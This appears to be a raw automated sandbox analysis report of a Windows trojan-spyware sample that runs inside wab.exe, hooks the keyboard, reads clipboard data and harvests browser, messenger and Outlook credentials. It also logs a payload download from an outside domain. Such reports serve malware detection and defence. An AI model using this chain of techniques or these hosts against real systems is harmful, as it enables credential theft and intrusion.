00000004.00000003.12118010524.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117417668.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118733760.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117107256.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117417668.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118733760.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117107256.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117029806.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117702946.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118480673.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
Source: wab.exe, 00000004.00000003.12115114712.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: wab.exe, 00000004.00000003.12124781462.00000000046D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tpc.g
Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
              Source: wab.exe, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/https://
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pa
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pagead/drt/ui
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=ie
              Source: wab.exe, 00000004.00000003.12115114712.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
              Source: wab.exe, 00000004.00000003.12115114712.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/https://
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/https://www.msn.com/de-c
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
              Source: unknownDNS traffic detected: queries for: kapsnovin.com
              Source: global trafficHTTP traffic detected: GET /KvGfOfeyMpEaqpzI164.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: kapsnovin.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: unknown TCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: wab.exe, 00000002.00000002.16935529143.0000000037530000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000004.00000003.12127760939.00000000046C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 00000004.00000003.12127760939.00000000046C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 00000002.00000002.16935346240.00000000374A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000002.00000002.16935346240.00000000374A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_00406B9A EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_00406C3D EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 6_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 6_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe Code function: 0_2_004052EE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

              E-Banking Fraud

              Source: Yara match File source: 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: wab.exe PID: 4672, type: MEMORYSTR
              Source: Yara match File source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe Code function: 0_2_00404B2B
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe Code function: 0_2_00406869
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 2_2_3756B5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 2_2_37577194
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_0040D044
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_004382F3
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_00430575
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_0043B671
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_0041F6CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_004119CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_00439B11
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_00438E54
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_00412F67
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_0043CF18
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 6_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 6_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 6_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 6_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 6_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0040CA466_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004052356_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004032C86_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004016896_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00402F606_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 6%
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes\trivalente.vid 49DCDF0CE96754B433C373ADBBA4B5B8B048F7E5DD1A0F9424500B79636D4722
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\BgImage.dll 27D3E3E359E1E04B173277221055D043E2F3BAAF78A5D6F7E3A0A5DFCB96222C
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeFile created: C:\Windows\resources\0409Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00412968 appears 78 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00421A32 appears 43 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044407A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_034A3947 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,2_2_034A3947
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00401806 NtdllDefWindowProc_W,4_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004018C0 NtdllDefWindowProc_W,4_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004016FC NtdllDefWindowProc_A,5_2_004016FC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004017B6 NtdllDefWindowProc_A,5_2_004017B6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00402CAC NtdllDefWindowProc_A,6_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00402D66 NtdllDefWindowProc_A,6_2_00402D66
              Source: SMGS-RCDU5010031.exeStatic PE information: invalid certificate
              Source: SMGS-RCDU5010031.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeFile created: C:\Users\user\Videos\frifundne.iniJump to behavior
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/32@3/3
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,4_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,4_2_0040B58D
              Source: SMGS-RCDU5010031.exeReversingLabs: Detection: 42%
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeFile read: C:\Users\user\Desktop\SMGS-RCDU5010031.exeJump to behavior
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\SMGS-RCDU5010031.exe C:\Users\user\Desktop\SMGS-RCDU5010031.exe
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\SMGS-RCDU5010031.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uhrhlaw
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ebwamkguuyj
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gdbsndrnigbudr
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 6_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | System information queried: HandleInformation
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | File created: C:\Users\user\AppData\Local\Temp\nsw158A.tmp
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Code function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Code function: 0_2_004045AF GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
               Source: wab.exe, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
               Source: wab.exe, wab.exe, 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
               Source: wab.exe, 00000002.00000002.16935346240.00000000374A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
               Source: wab.exe, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
               Source: wab.exe, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
               Source: wab.exe, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
               Source: wab.exe, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: \Sessions\1\BaseNamedObjects\ourvbpld-RBN2WW
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
               Source: SMGS-RCDU5010031.exe | Static file information: File size 2729832 > 1048576
               Source: SMGS-RCDU5010031.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

               Source: Yara match | File source: 00000000.00000002.12044516719.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match | File source: 00000002.00000002.16907433078.00000000030B1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match | File source: 00000000.00000002.12043367453.0000000000627000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match | File source: Process Memory Space: SMGS-RCDU5010031.exe PID: 1508, type: MEMORYSTR
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 2_2_37571219 push esp; iretd 2_2_3757121A
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 2_2_37562806 push ecx; ret 2_2_37562819
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4_2_0044693D push ecx; ret 4_2_0044694D
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4_2_0044DB70 push eax; ret 4_2_0044DB84
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4_2_0044DB70 push eax; ret 4_2_0044DBAC
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4_2_00451D54 push eax; ret 4_2_00451D61
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_00444355 push ecx; ret 5_2_00444365
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_004446D0 push eax; ret 5_2_004446E4
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_004446D0 push eax; ret 5_2_0044470C
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_0044AC84 push eax; ret 5_2_0044AC91
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 6_2_00414060 push eax; ret 6_2_00414074
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 6_2_00414060 push eax; ret 6_2_0041409C
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 6_2_00414039 push ecx; ret 6_2_00414049
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 6_2_004164EB push 0000006Ah; retf 6_2_004165C4
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 6_2_00416553 push 0000006Ah; retf 6_2_004165C4
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 6_2_00416555 push 0000006Ah; retf 6_2_004165C4
